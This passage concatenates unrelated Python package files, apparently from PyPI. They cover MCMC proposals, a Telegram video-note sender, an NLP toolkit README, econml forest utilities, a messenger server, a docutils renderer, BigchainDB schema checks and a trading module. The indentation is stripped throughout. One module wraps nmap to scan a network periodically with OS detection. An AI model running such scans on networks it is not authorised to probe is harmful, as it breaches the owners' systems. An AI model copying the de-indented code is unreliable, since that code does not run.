new_inds[key_in][(temp_inds, walker_inds, leaf_inds)] = new_val
if change == "-1":
# which walkers are removing
inds_reverse_rj = temp_inds * nwalkers + walker_inds
# setup reversal coords and inds
# need to determine Likelihood and prior of removed binaries.
# this goes into the multiple try proposal as previous ll and lp
temp_reverse_coords = {}
temp_reverse_inds = {}
for key in self.current_state.branches:
(
ntemps_tmp,
nwalkers_tmp,
nleaves_max_tmp,
ndim_tmp,
) = self.current_state.branches[key].shape
# coords from reversal
temp_reverse_coords[key] = self.current_state.branches[key].coords.reshape(
ntemps_tmp * nwalkers_tmp, nleaves_max_tmp, ndim_tmp
)[inds_reverse_rj][None, :]
# which inds array to use
inds_tmp_here = (
new_inds[key]
if key == key_in
else self.current_state.branches[key].inds
)
temp_reverse_inds[key] = inds_tmp_here.reshape(
ntemps * nwalkers, nleaves_max_tmp
)[inds_reverse_rj][None, :]
# calculate information for the reverse
lp_reverse_here = self.current_model.compute_log_prior_fn(
temp_reverse_coords, inds=temp_reverse_inds
)[0]
ll_reverse_here = self.current_model.compute_log_like_fn(
temp_reverse_coords, inds=temp_reverse_inds, logp=lp_here
)[0]
# fill the here values
ll_here[inds_reverse_rj] = ll_reverse_here
lp_here[inds_reverse_rj] = lp_reverse_here
# get mt proposal
generated_points, factors = self.get_mt_proposal(
coords_in,
random,
betas=betas_here,
ll_in=ll_here,
lp_in=lp_here,
inds_leaves_rj=inds_leaves_rj,
inds_reverse_rj=inds_reverse_rj,
)
# for reading outside
self.mt_ll = self.mt_ll.reshape(ntemps, nwalkers)
self.mt_lp = self.mt_lp.reshape(ntemps, nwalkers)
# which walkers have information added
inds_forward_rj = np.delete(np.arange(coords_in.shape[0]), inds_reverse_rj)
# updated the coordinates
temp_inds = all_inds_for_change["+1"][:, 0]
walker_inds = all_inds_for_change["+1"][:, 1]
leaf_inds = all_inds_for_change["+1"][:, 2]
q[key_in][(temp_inds, walker_inds, leaf_inds)] = generated_points[
inds_forward_rj
]
return q, new_inds, factors.reshape(ntemps, nwalkers) | PypiClean |
/Hikka_Pyro_New-2.0.103-py3-none-any.whl/hikkapyro/methods/messages/send_video_note.py |
import os
from datetime import datetime
from typing import Union, BinaryIO, Optional, Callable
import hikkapyro
from hikkapyro import StopTransmission
from hikkapyro import raw
from hikkapyro import types
from hikkapyro import utils
from hikkapyro.errors import FilePartMissing
from hikkapyro.file_id import FileType
class SendVideoNote:
async def send_video_note(
self: "hikkapyro.Client",
chat_id: Union[int, str],
video_note: Union[str, BinaryIO],
duration: int = 0,
length: int = 1,
thumb: Union[str, BinaryIO] = None,
disable_notification: bool = None,
reply_to_message_id: int = None,
schedule_date: datetime = None,
protect_content: bool = None,
reply_markup: Union[
"types.InlineKeyboardMarkup",
"types.ReplyKeyboardMarkup",
"types.ReplyKeyboardRemove",
"types.ForceReply"
] = None,
progress: Callable = None,
progress_args: tuple = ()
) -> Optional["types.Message"]:
"""Send video messages.
.. include:: /_includes/usable-by/users-bots.rst
Parameters:
chat_id (``int`` | ``str``):
Unique identifier (int) or username (str) of the target chat.
For your personal cloud (Saved Messages) you can simply use "me" or "self".
For a contact that exists in your Telegram address book you can use his phone number (str).
video_note (``str`` | ``BinaryIO``):
Video note to send.
Pass a file_id as string to send a video note that exists on the Telegram servers,
pass a file path as string to upload a new video note that exists on your local machine, or
pass a binary file-like object with its attribute ".name" set for in-memory uploads.
Sending video notes by a URL is currently unsupported.
duration (``int``, *optional*):
Duration of sent video in seconds.
length (``int``, *optional*):
Video width and height.
thumb (``str`` | ``BinaryIO``, *optional*):
Thumbnail of the video sent.
The thumbnail should be in JPEG format and less than 200 KB in size.
A thumbnail's width and height should not exceed 320 pixels.
Thumbnails can't be reused and can be only uploaded as a new file.
disable_notification (``bool``, *optional*):
Sends the message silently.
Users will receive a notification with no sound.
reply_to_message_id (``int``, *optional*):
If the message is a reply, ID of the original message
schedule_date (:py:obj:`~datetime.datetime`, *optional*):
Date when the message will be automatically sent.
protect_content (``bool``, *optional*):
Protects the contents of the sent message from forwarding and saving.
reply_markup (:obj:`~pyrogram.types.InlineKeyboardMarkup` | :obj:`~pyrogram.types.ReplyKeyboardMarkup` | :obj:`~pyrogram.types.ReplyKeyboardRemove` | :obj:`~pyrogram.types.ForceReply`, *optional*):
Additional interface options. An object for an inline keyboard, custom reply keyboard,
instructions to remove reply keyboard or to force a reply from the user.
progress (``Callable``, *optional*):
Pass a callback function to view the file transmission progress.
The function must take *(current, total)* as positional arguments (look at Other Parameters below for a
detailed description) and will be called back each time a new file chunk has been successfully
transmitted.
progress_args (``tuple``, *optional*):
Extra custom arguments for the progress callback function.
You can pass anything you need to be available in the progress callback scope; for example, a Message
object or a Client instance in order to edit the message with the updated progress status.
Other Parameters:
current (``int``):
The amount of bytes transmitted so far.
total (``int``):
The total size of the file.
*args (``tuple``, *optional*):
Extra custom arguments as defined in the ``progress_args`` parameter.
You can either keep ``*args`` or add every single extra argument in your function signature.
Returns:
:obj:`~pyrogram.types.Message` | ``None``: On success, the sent video note message is returned, otherwise,
in case the upload is deliberately stopped with :meth:`~pyrogram.Client.stop_transmission`, None is
returned.
Example:
.. code-block:: python
# Send video note by uploading from local file
await app.send_video_note("me", "video_note.mp4")
# Set video note length
await app.send_video_note("me", "video_note.mp4", length=25)
"""
file = None
try:
if isinstance(video_note, str):
if os.path.isfile(video_note):
thumb = await self.save_file(thumb)
file = await self.save_file(video_note, progress=progress, progress_args=progress_args)
media = raw.types.InputMediaUploadedDocument(
mime_type=self.guess_mime_type(video_note) or "video/mp4",
file=file,
thumb=thumb,
attributes=[
raw.types.DocumentAttributeVideo(
round_message=True,
duration=duration,
w=length,
h=length
)
]
)
else:
media = utils.get_input_media_from_file_id(video_note, FileType.VIDEO_NOTE)
else:
thumb = await self.save_file(thumb)
file = await self.save_file(video_note, progress=progress, progress_args=progress_args)
media = raw.types.InputMediaUploadedDocument(
mime_type=self.guess_mime_type(video_note.name) or "video/mp4",
file=file,
thumb=thumb,
attributes=[
raw.types.DocumentAttributeVideo(
round_message=True,
duration=duration,
w=length,
h=length
)
]
)
while True:
try:
r = await self.invoke(
raw.functions.messages.SendMedia(
peer=await self.resolve_peer(chat_id),
media=media,
silent=disable_notification or None,
reply_to_msg_id=reply_to_message_id,
random_id=self.rnd_id(),
schedule_date=utils.datetime_to_timestamp(schedule_date),
noforwards=protect_content,
reply_markup=await reply_markup.write(self) if reply_markup else None,
message=""
)
)
except FilePartMissing as e:
await self.save_file(video_note, file_id=file.id, file_part=e.value)
else:
for i in r.updates:
if isinstance(i, (raw.types.UpdateNewMessage,
raw.types.UpdateNewChannelMessage,
raw.types.UpdateNewScheduledMessage)):
return await types.Message._parse(
self, i.message,
{i.id: i for i in r.users},
{i.id: i for i in r.chats},
is_scheduled=isinstance(i, raw.types.UpdateNewScheduledMessage)
)
except StopTransmission:
return None | PypiClean |
/NlpToolkit-DataStructure-1.0.14.tar.gz/NlpToolkit-DataStructure-1.0.14/README.md | Cache
============
The idea of caching items for fast retrieval goes back nearly to the beginning of the computer science. We also use that idea and use a LRU cache for storing morphological analyses of surface forms. Before analyzing a surface form, we first look up to the cache, and if there is an hit, we just take the analyses from the cache. If there is a miss, we analyze the surface form and put the morphological analyses of that surface form in the LRU cache. As can be expected, the speed of the caching mechanism surely depends on the size of the cache.
For Developers
============
You can also see [Cython](https://github.com/starlangsoftware/DataStructure-Cy), [Java](https://github.com/starlangsoftware/DataStructure), [C++](https://github.com/starlangsoftware/DataStructure-CPP), [Swift](https://github.com/starlangsoftware/DataStructure-Swift), [Js](https://github.com/starlangsoftware/DataStructure-Js), or [C#](https://github.com/starlangsoftware/DataStructure-CS) repository.
## Requirements
* [Python 3.7 or higher](#python)
* [Git](#git)
### Python
To check if you have a compatible version of Python installed, use the following command:
python -V
You can find the latest version of Python [here](https://www.python.org/downloads/).
### Git
Install the [latest version of Git](https://git-scm.com/book/en/v2/Getting-Started-Installing-Git).
## Pip Install
pip3 install NlpToolkit-DataStructure
## Download Code
In order to work on code, create a fork from GitHub page.
Use Git for cloning the code to your local or below line for Ubuntu:
git clone <your-fork-git-link>
A directory called DataStructure will be created. Or you can use below link for exploring the code:
git clone https://github.com/starlangsoftware/DataStructure-Py.git
## Open project with Pycharm IDE
Steps for opening the cloned project:
* Start IDE
* Select **File | Open** from main menu
* Choose `DataStructure-PY` file
* Select open as project option
* Couple of seconds, dependencies will be downloaded.
For Developers
============
+ [CounterHashMap](#counterhashmap)
+ [LRUCache](#lrucache)
## CounterHashMap
CounterHashMap bir veri tipinin kaç kere geçtiğini hafızada tutmak için kullanılmaktadır.
Bir CounterHashMap yaratmak için
a = CounterHashMap()
Hafızaya veri eklemek için
put(self, key: object)
Örneğin,
a.put("ali");
Bu aşamanın ardından "ali" nin sayacı 1 olur.
Hafızaya o veriyi birden fazla kez eklemek için
putNTimes(self, key: object, N: int)
Örneğin,
a.putNTimes("veli", 5)
Bu aşamanın ardından "ali"'nin sayacı 5 olur.
Hafızada o verinin kaç kere geçtiğini bulmak için
count(self, key: object) -> int
Örneğin, "veli" nin kaç kere geçtiğini bulmak için
kacKere = a.count("veli")
Bu aşamanın ardından kacKere değişkeninin değeri 5 olur.
Hafızada hangi verinin en çok geçtiğini bulmak için
max(self) -> object
Örneğin,
kelime = a.max()
Bu aşamanın ardından kelime "veli" olur.
## LRUCache
LRUCache veri cachelemek için kullanılan bir veri yapısıdır. LRUCache en yakın zamanda
kullanılan verileri öncelikli olarak hafızada tutar. Bir LRUCache yaratmak için
LRUCache(self, cacheSize: int)
kullanılır. cacheSize burada cachelenecek verinin büyüklüğünün limitini göstermektedir.
Cache'e bir veri eklemek için
add(self, key: object, data: object)
kullanılır. data burada eklenecek veriyi, key anahtar göstergeyi göstermektedir.
Cache'de bir veri var mı diye kontrol etmek için
contains(self, key: object) -> bool
kullanılır.
Cache'deki veriyi anahtarına göre getirmek için
get(self, key: object) -> object
kullanılır.
| PypiClean |
/IPNB-video-embed-0.0.3.tar.gz/IPNB-video-embed-0.0.3/src/IPNBvideoembed/youtube.py | from ensure import ensure_annotations
from IPNBvideoembed.logger import logger
from IPNBvideoembed.custom_exception import InvalidURLException
from py_youtube import Data
from IPython import display
@ensure_annotations
def get_time_info(url: str) -> int:
def _verify_videoIDlen(videoID: str, __expected_len=11):
if len(videoID) != __expected_len:
raise InvalidURLException(
f"Invalid URL: {url}, expected length of videoID is {__expected_len}"
)
try:
split_val = url.split("=")
if (len(split_val) > 3) or (len(url.split("==")) > 1):
raise InvalidURLException
if "watch" in url:
if "&t" in url:
vid_id, time = url.split("=")[-2][:-2], int(url.split("=")[-1][:-1])
_verify_videoIDlen(vid_id)
logger.info(f"video starts at: {time}")
return time
else:
vid_id, time = url.split("=")[-1], 0
_verify_videoIDlen(vid_id)
logger.info(f"video starts at: {time}")
return time
else:
if ("=" in url) and ("&t=" in url):
vid_id, time = url.split("/")[-1].split("?")[0], int(
url.split("/")[-1].split("?")[1].split("=")[-1]
)
_verify_videoIDlen(vid_id)
logger.info(f"video starts at: {time}")
return time
else:
vid_id, time = url.split("/")[-1].split("?")[0], 0
_verify_videoIDlen(vid_id)
logger.info(f"video starts at: {time}")
return time
except Exception:
raise InvalidURLException
@ensure_annotations
def render_youtube_video(url: str, width: int = 780, height: int = 600) -> str:
try:
if url is None:
raise InvalidURLException("URL cannot be None")
data = Data(url).data()
if data["publishdate"] is not None:
time = get_time_info(url)
vid_ID = data["id"]
embed_url = f"https://www.youtube.com/embed/{vid_ID}/?start={time}"
logger.info(f"embed_url = {embed_url}")
iframe = f"""
<iframe width="{width}" height="{height}"
src="{embed_url}"
title="YouTube video player"
frameborder="0"
allow="accelerometer; autoplay;
clipboard-write; encrypted-media;
gyroscope; picture-in-picture;
web-share" allowfullscreen>
</iframe>
"""
display.display(display.HTML(iframe))
return "success"
else:
raise InvalidURLException("Invalid URL")
except Exception as e:
raise e | PypiClean |
/LUBEAT-0.13.1-cp38-cp38-macosx_10_9_x86_64.whl/econml/_ensemble/_utilities.py |
import numbers
import numpy as np
def _get_n_samples_subsample(n_samples, max_samples):
"""
Get the number of samples in a sub-sample without replacement.
Parameters
----------
n_samples : int
Number of samples in the dataset.
max_samples : int or float
The maximum number of samples to draw from the total available:
- if float, this indicates a fraction of the total and should be
the interval `(0, 1)`;
- if int, this indicates the exact number of samples;
- if None, this indicates the total number of samples.
Returns
-------
n_samples_subsample : int
The total number of samples to draw for the subsample.
"""
if max_samples is None:
return n_samples
if isinstance(max_samples, numbers.Integral):
if not (1 <= max_samples <= n_samples):
msg = "`max_samples` must be in range 1 to {} but got value {}"
raise ValueError(msg.format(n_samples, max_samples))
return max_samples
if isinstance(max_samples, numbers.Real):
if not (0 < max_samples <= 1):
msg = "`max_samples` must be in range (0, 1) but got value {}"
raise ValueError(msg.format(max_samples))
return int(np.floor(n_samples * max_samples))
msg = "`max_samples` should be int or float, but got type '{}'"
raise TypeError(msg.format(type(max_samples)))
def _accumulate_prediction(predict, X, out, lock, *args, **kwargs):
"""
This is a utility function for joblib's Parallel.
It can't go locally in ForestClassifier or ForestRegressor, because joblib
complains that it cannot pickle it when placed there.
"""
prediction = predict(X, *args, check_input=False, **kwargs)
with lock:
if len(out) == 1:
out[0] += prediction
else:
for i in range(len(out)):
out[i] += prediction[i]
def _accumulate_prediction_var(predict, X, out, lock, *args, **kwargs):
"""
This is a utility function for joblib's Parallel.
It can't go locally in ForestClassifier or ForestRegressor, because joblib
complains that it cannot pickle it when placed there.
Accumulates the mean covariance of a tree prediction. predict is assumed to
return an array of (n_samples, d) or a tuple of arrays. This method accumulates in the placeholder
out[0] the (n_samples, d, d) covariance of the columns of the prediction across
the trees and for each sample (or a tuple of covariances to be stored in each element
of the list out).
"""
prediction = predict(X, *args, check_input=False, **kwargs)
with lock:
if len(out) == 1:
out[0] += np.einsum('ijk,ikm->ijm',
prediction.reshape(prediction.shape + (1,)),
prediction.reshape((-1, 1) + prediction.shape[1:]))
else:
for i in range(len(out)):
pred_i = prediction[i]
out[i] += np.einsum('ijk,ikm->ijm',
pred_i.reshape(pred_i.shape + (1,)),
pred_i.reshape((-1, 1) + pred_i.shape[1:]))
def _accumulate_prediction_and_var(predict, X, out, out_var, lock, *args, **kwargs):
"""
This is a utility function for joblib's Parallel.
It can't go locally in ForestClassifier or ForestRegressor, because joblib
complains that it cannot pickle it when placed there.
Combines `_accumulate_prediction` and `_accumulate_prediction_var` in a single
parallel run, so that out will contain the mean of the predictions across trees
and out_var the covariance.
"""
prediction = predict(X, *args, check_input=False, **kwargs)
with lock:
if len(out) == 1:
out[0] += prediction
out_var[0] += np.einsum('ijk,ikm->ijm',
prediction.reshape(prediction.shape + (1,)),
prediction.reshape((-1, 1) + prediction.shape[1:]))
else:
for i in range(len(out)):
pred_i = prediction[i]
out[i] += prediction
out_var[i] += np.einsum('ijk,ikm->ijm',
pred_i.reshape(pred_i.shape + (1,)),
pred_i.reshape((-1, 1) + pred_i.shape[1:]))
def _accumulate_oob_preds(tree, X, subsample_inds, alpha_hat, jac_hat, counts, lock):
mask = np.ones(X.shape[0], dtype=bool)
mask[subsample_inds] = False
alpha, jac = tree.predict_alpha_and_jac(X[mask])
with lock:
alpha_hat[mask] += alpha
jac_hat[mask] += jac
counts[mask] += 1 | PypiClean |
/Moshu_QtMesseger_server-0.1-py3-none-any.whl/server/server.py | import sys
import os
import argparse
import logging
import configparser
import logs.config_server_log
from common.variables import *
from common.utils import *
from common.decos import log
from server.core import MessageProcessor
from server.database import ServerStorage
from server.main_window import MainWindow
from PyQt5.QtWidgets import QApplication
from PyQt5.QtCore import Qt
# Инициализация логирования сервера.
logger = logging.getLogger('server_dist')
@log
def arg_parser(default_port, default_address):
"""Парсер аргументов коммандной строки."""
logger.debug(
f'Инициализация парсера аргументов коммандной строки: {sys.argv}')
parser = argparse.ArgumentParser()
parser.add_argument('-p', default=default_port, type=int, nargs='?')
parser.add_argument('-a', default=default_address, nargs='?')
parser.add_argument('--no_gui', action='store_true')
namespace = parser.parse_args(sys.argv[1:])
listen_address = namespace.a
listen_port = namespace.p
gui_flag = namespace.no_gui
logger.debug('Аргументы успешно загружены.')
return listen_address, listen_port, gui_flag
@log
def config_load():
"""Парсер конфигурационного ini файла."""
config = configparser.ConfigParser()
dir_path = os.getcwd()
config.read(f"{dir_path}/{'server_dist+++.ini'}")
# Если конфиг файл загружен правильно, запускаемся, иначе конфиг по
# умолчанию.
if 'SETTINGS' in config:
return config
else:
config.add_section('SETTINGS')
config.set('SETTINGS', 'Default_port', str(DEFAULT_PORT))
config.set('SETTINGS', 'Listen_Address', '')
config.set('SETTINGS', 'Database_path', '')
config.set('SETTINGS', 'Database_file', 'server_database.db3')
return config
@log
def main():
'''Основная функция'''
# Загрузка файла конфигурации сервера
config = config_load()
# Загрузка параметров командной строки, если нет параметров, то задаём
# значения по умоланию.
listen_address, listen_port, gui_flag = arg_parser(
config['SETTINGS']['Default_port'], config['SETTINGS']['Listen_Address'])
# Инициализация базы данных
database = ServerStorage(
os.path.join(
config['SETTINGS']['Database_path'],
config['SETTINGS']['Database_file']))
# Создание экземпляра класса - сервера и его запуск:
server = MessageProcessor(listen_address, listen_port, database)
server.daemon = True
server.start()
# Если указан параметр без GUI то запускаем простенький обработчик
# консольного ввода
if gui_flag:
while True:
command = input('Введите exit для завершения работы сервера.')
if command == 'exit':
# Если выход, то завршаем основной цикл сервера.
server.running = False
server.join()
break
# Если не указан запуск без GUI, то запускаем GUI:
else:
# Создаём графическое окуружение для сервера:
server_app = QApplication(sys.argv)
server_app.setAttribute(Qt.AA_DisableWindowContextHelpButton)
main_window = MainWindow(database, server, config)
# Запускаем GUI
server_app.exec_()
# По закрытию окон останавливаем обработчик сообщений
server.running = False
if __name__ == '__main__':
main() | PypiClean |
/Kamaelia-0.6.0.tar.gz/Kamaelia-0.6.0/Tools/DocGen/renderHTML.py | import textwrap
import inspect
import pprint
import time
from docutils import core
from docutils import nodes
import docutils
import re
class RenderHTML(object):
"""\
RenderHTML([debug][,titlePrefix][,urlPrefix][,rawFooter]) -> new RenderHTML object
Renders docutils document trees to html with Kamaelia website specific
directives.
Also contains helper functions for determining filenames and URIs for
documents.
Keyword arguments::
- debug -- Optional. True for debugging mode - currently does nothing (default=False)
- titlePrefix -- Optional. Prefix for the HTML <head><title> (default="")
- urlPrefix -- Optional. Prefix for all URLs. Should include a trailing slash if needed (default="")
- rawFooter -- Optional. Footer text that will be appended just before the </body></html> tags (default="")
"""
def __init__(self, debug=False, titlePrefix="", urlPrefix="",rawFooter=""):
super(RenderHTML,self).__init__()
self.titlePrefix=titlePrefix
self.debug=debug
self.urlPrefix=urlPrefix
self.rawFooter=rawFooter
self.mappings={}
def makeFilename(self, docName):
"""\
Returns the file name for a given document name.
Eg. "Kamaelia.Chassis" will be mapped to something like "Kamaelia.Chassis.html"
"""
return docName + ".html"
def makeURI(self, docName,internalRef=None):
"""\
Returns the URI for a given document name. Takes into account the url prefix.
Eg. "Kamaelia.Chassis" will be mapped to something like "/mydocs/Kamaelia.Chassis.html"
"""
if internalRef is not None:
suffix="#"+internalRef
else:
suffix=""
return self.urlPrefix+self.makeFilename(docName)+suffix
def setAutoCrossLinks(self, mappings):
"""\
Set mapping for the automagic generation of hyperlinks between content.
Supply a dict of mappings mapping patterns (strings) to the fully qualified
entity name to be linked to.
"""
self.mappings = {}
for (key,ref) in mappings.items():
# compile as an RE - detects the pattern providing nothign preceeds it,
# and it is not part of a larger pattern, eg A.B is part of A.B.C
pattern=re.compile("(?<![a-zA-Z0-9._])"+re.escape(key)+"(?!\.?[a-zA-Z0-9_])")
# convert the destination to a URI
uri = self.makeURI(ref)
self.mappings[pattern] = uri
def addAutoLinksToURI(self, mappings):
for (key,uri) in mappings.items():
pattern=re.compile("(?<![a-zA-Z0-9._])"+re.escape(key)+"(?!\.?[a-zA-Z0-9_])")
self.mappings[pattern] = uri
def render(self, docName, docTree):
"""\
Render the named document tree as HTML with Kamaelia website specific directives.
Returns string containing the entire HTML document.
"""
if not isinstance(docTree, nodes.document):
root = core.publish_doctree('')
root.append(docTree)
docTree = root
docTree.attributes['title']=docName
# do this first, before we turn the boxright nodes into "[ [boxright] ... ]"
docTree.transformer.add_transform(squareBracketReplace_transform)
docTree.transformer.apply_transforms()
docTree.transformer.add_transform(boxright_transform)
docTree.transformer.add_transform(crosslink_transform, priority=None, mappings=self.mappings)
docTree.transformer.apply_transforms()
reader = docutils.readers.doctree.Reader(parser_name='null')
pub = core.Publisher(reader, None, None, source=docutils.io.DocTreeInput(docTree),
destination_class=docutils.io.StringOutput)
pub.set_writer("html")
output = pub.publish(enable_exit_status=None)
parts = pub.writer.parts
doc = parts["html_title"] \
+ parts["html_subtitle"] \
+ parts["docinfo"] \
+ parts["fragment"]
wholedoc = self.headers(docTree) + doc + self.footers(docTree)
return wholedoc
def headers(self,doc):
title = self.titlePrefix + doc.attributes['title']
return """\
<html>
<head>
<title>"""+title+"""</title>
<style type="test/css">
pre.literal-block, pre.doctest-block {
margin-left: 2em ;
margin-right: 2em ;
background-color: #eeeeee }
</style>
</head>
<body>
"""
def footers(self,doc):
return self.rawFooter+"</body></html>\n"
from Nodes import boxright
class boxright_transform(docutils.transforms.Transform):
"""\
Transform that replaces boxright nodes with the corresponding Kamaelia
website [[boxright] <child node content> ] directive
"""
default_priority=100
def apply(self):
boxes=[]
for target in self.document.traverse(boxright):
target.insert(0, nodes.Text("[[boxright] "))
target.append(nodes.Text("]"))
boxes.append(target)
for box in boxes:
box.replace_self( nodes.container('', *box.children) )
class crosslink_transform(docutils.transforms.Transform):
"""\
Transform that searches text in the document for any of the patterns in the
supplied set of mappings. If a pattern is found it is converted to a
hyperlink
"""
default_priority=100
def apply(self, mappings):
self.mappings = mappings
self.recurse(self.document)
def recurse(self, parent):
i=0
while i<len(parent.children):
thisNode = parent[i]
if isinstance(thisNode, nodes.Text):
changeMade = self.crosslink(parent, i)
if not changeMade:
i=i+1
else:
if isinstance(thisNode, (nodes.reference,)): # nodes.literal_block)):
pass
elif thisNode.children:
self.recurse(thisNode)
i=i+1
def crosslink(self, parent, i):
text = parent[i].astext()
for pattern in self.mappings.keys():
match = pattern.search(text)
if match:
head = text[:match.start()]
tail = text[match.end():]
middle = text[match.start():match.end()]
URI = self.mappings[pattern]
parent.remove(parent[i])
if tail:
parent.insert(i, nodes.Text(tail))
if middle:
parent.insert(i, nodes.reference('', nodes.Text(middle), refuri=URI))
if head:
parent.insert(i, nodes.Text(head))
return True
return False
class squareBracketReplace_transform(docutils.transforms.Transform):
"""\
Transform that replaces square brackets in text with escape codes, so that
the Kamaelia website doesn't interpret them as directives
"""
default_priority=100
def apply(self):
for target in self.document.traverse(nodes.Text):
newText = target.replace("[","%91%")
newText = newText.replace("]","%93%")
target.parent.replace(target, newText) | PypiClean |
/LumberMill-0.9.5.7-py3-none-any.whl/lumbermill/input/NmapScanner.py | import sys
import nmap
import lumbermill.utils.DictUtils as DictUtils
from lumbermill.BaseModule import BaseModule
from lumbermill.utils.Decorators import ModuleDocstringParser, setInterval
from lumbermill.utils.misc import TimedFunctionManager
@ModuleDocstringParser
class NmapScanner(BaseModule):
"""
Scan network with nmap and emit result as new event.
Configuration template:
- input.NmapScanner:
network: # <type: string; is: required>
netmask: # <default: '/24'; type: string; is: optional>
ports: # <default: None; type: None||string; is: optional>
arguments: # <default: '-O -F --osscan-limit'; type: string; is: optional>
interval: # <default: 900; type: integer; is: optional>
receivers:
- NextModule
"""
module_type = "input"
"""Set module type"""
# TODO: This module can run in forked processes. We need some way to partition the network and give each process a
# segment to scan.
can_run_forked = False
def configure(self, configuration):
# Call parent configure method
BaseModule.configure(self, configuration)
self.network = self.getConfigurationValue('network')
self.netmask = self.getConfigurationValue('netmask')
self.arguments = self.getConfigurationValue('arguments')
def getScannerFunc(self):
@setInterval(self.getConfigurationValue('interval'), call_on_init=True)
def scanNetwork():
# Get all alive hosts
try:
scan_results = self.scanner.scan('%s%s' % (self.network,self.netmask), arguments="-sn")
except nmap.PortScannerError:
etype, evalue, etb = sys.exc_info()
self.logger.warning("Scanning failed. Exception: %s, Error: %s." % (etype, evalue))
return
for host, scan_result in scan_results['scan'].items():
try:
host_scan_result = self.scanner.scan('%s/32' % (host), arguments=self.arguments)
except nmap.PortScannerError:
etype, evalue, etb = sys.exc_info()
self.logger.warning("Scanning failed. Exception: %s, Error: %s." % (etype, evalue))
return
if host in host_scan_result['scan']:
self.handleEvent(host, host_scan_result['scan'][host])
return scanNetwork
def handleEvent(self, host, scan_result):
# Get OS from scan.
if 'osmatch' in scan_result:
os_info = sorted(scan_result['osmatch'], key=lambda k: int(k['accuracy']))
scan_result['detected_os'] = os_info[0]['name']
scan_result.pop('osmatch')
if 'vendor' in scan_result and isinstance(scan_result['vendor'], dict) and len(scan_result['vendor']) > 0:
scan_result['vendor'] = scan_result['vendor'].values()[0]
# Drop some fields.
if 'osclass' in scan_result:
scan_result.pop('osclass')
event = DictUtils.getDefaultEventDict(scan_result, caller_class_name=self.__class__.__name__)
event['lumbermill']['event_type'] = 'nmap_scan'
self.sendEvent(event)
def start(self):
self.scanner = nmap.PortScanner()
timed_func = self.getScannerFunc()
self.timed_func_handler = TimedFunctionManager.startTimedFunction(timed_func) | PypiClean |
/BigchainDBNext-2.2.2.1.tar.gz/BigchainDBNext-2.2.2.1/bigchaindb/common/schema/__init__.py |
"""Schema validation related functions and data"""
import os.path
import logging
import jsonschema
import yaml
import rapidjson
from bigchaindb.common.exceptions import SchemaValidationError
logger = logging.getLogger(__name__)
def _load_schema(name, path=__file__):
"""Load a schema from disk"""
path = os.path.join(os.path.dirname(path), name + '.yaml')
with open(path) as handle:
schema = yaml.safe_load(handle)
fast_schema = rapidjson.Validator(rapidjson.dumps(schema))
return path, (schema, fast_schema)
TX_SCHEMA_VERSION = 'v2.0'
TX_SCHEMA_PATH, TX_SCHEMA_COMMON = _load_schema('transaction_' +
TX_SCHEMA_VERSION)
_, TX_SCHEMA_CREATE = _load_schema('transaction_create_' +
TX_SCHEMA_VERSION)
_, TX_SCHEMA_TRANSFER = _load_schema('transaction_transfer_' +
TX_SCHEMA_VERSION)
_, TX_SCHEMA_VALIDATOR_ELECTION = _load_schema('transaction_validator_election_' +
TX_SCHEMA_VERSION)
_, TX_SCHEMA_CHAIN_MIGRATION_ELECTION = _load_schema('transaction_chain_migration_election_' +
TX_SCHEMA_VERSION)
_, TX_SCHEMA_VOTE = _load_schema('transaction_vote_' + TX_SCHEMA_VERSION)
def _validate_schema(schema, body):
"""Validate data against a schema"""
# Note
#
# Schema validation is currently the major CPU bottleneck of
# BigchainDB. the `jsonschema` library validates python data structures
# directly and produces nice error messages, but validation takes 4+ ms
# per transaction which is pretty slow. The rapidjson library validates
# much faster at 1.5ms, however it produces _very_ poor error messages.
# For this reason we use both, rapidjson as an optimistic pathway and
# jsonschema as a fallback in case there is a failure, so we can produce
# a helpful error message.
try:
schema[1](rapidjson.dumps(body))
except ValueError as exc:
try:
jsonschema.validate(body, schema[0])
except jsonschema.ValidationError as exc2:
raise SchemaValidationError(str(exc2)) from exc2
logger.warning('code problem: jsonschema did not raise an exception, wheras rapidjson raised %s', exc)
raise SchemaValidationError(str(exc)) from exc
def validate_transaction_schema(tx):
"""Validate a transaction dict.
TX_SCHEMA_COMMON contains properties that are common to all types of
transaction. TX_SCHEMA_[TRANSFER|CREATE] add additional constraints on top.
"""
_validate_schema(TX_SCHEMA_COMMON, tx)
if tx['operation'] == 'TRANSFER':
_validate_schema(TX_SCHEMA_TRANSFER, tx)
else:
_validate_schema(TX_SCHEMA_CREATE, tx) | PypiClean |
/Lab93-Finance-0.0.1.4.tar.gz/Lab93-Finance-0.0.1.4/src/Lab93_Finance/__init__.py | from datetime import datetime, timedelta
from time import sleep
# Lab-93 Modules
from Lab93_DatabaseSystem import AdministratorDatabase
# Local Imports
from .graphing.CandlestickGraphs import drawCandlestick
from .data import PriceData
from .data.historic import Queries
from .account import AccountDetails
from .trading import TradeBroker
AdminDB = AdministratorDatabase()
today = datetime.today()
yesterday = today - timedelta(days=1)
# Establish connection to the broker API
AlpacaAPI = AccountDetails(
( AdminDB.Retrieve( user = "admin",
platform = "alpaca_key" ),
AdminDB.Retrieve( user = "admin",
platform = "alpaca_secret" ) )
)
CryptoPrices = PriceData(
asset_type = "crypto", credentials = \
( AdminDB.Retrieve( user = "admin",
platform = "alpaca_key" ),
AdminDB.Retrieve( user = "admin",
platform = "alpaca_secret" ) )
)
def Ticker():
while True:
sleep(1)
yield format(CryptoPrices.CurrentPrice("BTC/USD"), ".2f")
TradingBroker = TradeBroker(AlpacaAPI.client)
class GraphingReports:
def __init__(self, start=yesterday, end=today,
output = "/server/front-end/assets/data-science/reports" ):
# Collect High, Low, Open, Close, and Times for the given symbol.
# TODO: Allow for custom symbol entries.
# TODO: Allow for custom timeframes.
# TODO: Retrieve credentials from environment.
data = Queries( start = start, end = end, symbols = [ "BTC/USD" ],
timeframe = "hour",
credentials = ( AdminDB.Retrieve( user = "admin",
platform = "alpaca_key" ),
AdminDB.Retrieve( user = "admin",
platform = "alpaca_secret" ) ) )\
.HLOC()\
.data
# Convert start date into string separated by forward slashes.
datestring = datetime.strftime(start, "%Y/%m/%d")
# Organize data array into packet hashmap for passing to Candlestick class.
self.packet = {
"time": [ line.timestamp for symbol in data for line in data[symbol] ],
"high": [ line.high for symbol in data for line in data[symbol] ],
"low": [ line.low for symbol in data for line in data[symbol] ],
"open": [ line.open for symbol in data for line in data[symbol] ],
"close": [ line.close for symbol in data for line in data[symbol] ],
"symbol": [ line.symbol for symbol in data for line in data[symbol] ][0]
}
# Draw the candlestick graph at the specially formulated filepath.
